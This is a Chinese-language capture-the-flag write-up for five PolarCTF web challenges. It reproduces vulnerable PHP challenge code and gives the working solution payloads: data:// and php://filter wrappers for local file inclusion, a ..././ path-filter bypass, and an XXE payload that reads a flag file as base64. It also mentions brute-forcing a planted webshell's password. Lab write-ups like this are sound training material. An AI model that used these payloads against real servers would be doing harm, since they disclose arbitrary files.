polarctf-web(21-25)

网站被黑

考察点

php伪协议

解题

请求头中找到hint,base32解密后是/n0_0ne_f1nd_m3/

访问后得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
error_reporting(0);

$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag|data|base|write|input/i",$file)){
        echo "I am sorry but no way!";
        exit(); 
    }else{
        include($file);  //imposible.php
    }
}
else{
    highlight_file(__FILE__);
}
?>

用data协议传入数据流到text满足第一个if text=data://text/plain,welcome to the 504sys

用php伪协议包含被编码后的imposible.php(不编码直接包含不会在前端显示) php://filter/read=string.rot13/resource=imposible.php

GET-POST

考察点

get\post请求

解题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php 
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
include('flag.php');//文件包含,flag在flag.php文件中,不用想了你访问也没用
$id = $_GET['id'];
echo "你必须让我感受到你的真诚,用GET请求传递一下id吧,令id=1";
if($id == '1'){
    echo "干的漂亮";
    echo "<br/>";
    echo "虽然我感受到了你的真诚,但还是不行,用POST请求传递一下jljcxy吧,令jljcxy=flag";
    $jljcxy = $_POST['jljcxy'];
    if($jljcxy == 'flag'){
        echo $flag;
    }
}

直接传参就行

被黑掉的站

考察点

目录扫描,字典爆破

解题

扫描目录发现字典和shell木马,用字典爆破shell的密码,得到flag

签到提

考察点

请求头、php伪协议

解题

修改cookie得到/data/index.php路径

传入php://filter/convert.base64-encode/resource=..././..././..././..././flag读取flag.php文件内容

xxe

考察点

xxe漏洞

解题

扫描目录发现有个dom.php返回内容为

1
2
Warning: DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1 in /var/www/html/dom.php on line 5
DOMDocument Object ( [doctype] => [implementation] => (object value omitted) [documentElement] => [actualEncoding] => [encoding] => [xmlEncoding] => [standalone] => 1 [xmlStandalone] => 1 [version] => 1.0 [xmlVersion] => 1.0 [strictErrorChecking] => 1 [documentURI] => [config] => [formatOutput] => [validateOnParse] => [resolveExternals] => [preserveWhiteSpace] => 1 [recover] => [substituteEntities] => [nodeName] => #document [nodeValue] => [nodeType] => 9 [parentNode] => [childNodes] => (object value omitted) [firstChild] => [lastChild] => [previousSibling] => [nextSibling] => [attributes] => [ownerDocument] => [namespaceURI] => [prefix] => [localName] => [baseURI] => [textContent] => )

可知此处能传入xml

1
2
3
4
5
6
7
<?xml version = "1.0" encoding="utf-8"?>
 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
<name>&xxe;</name>

返回被base64编码后的flag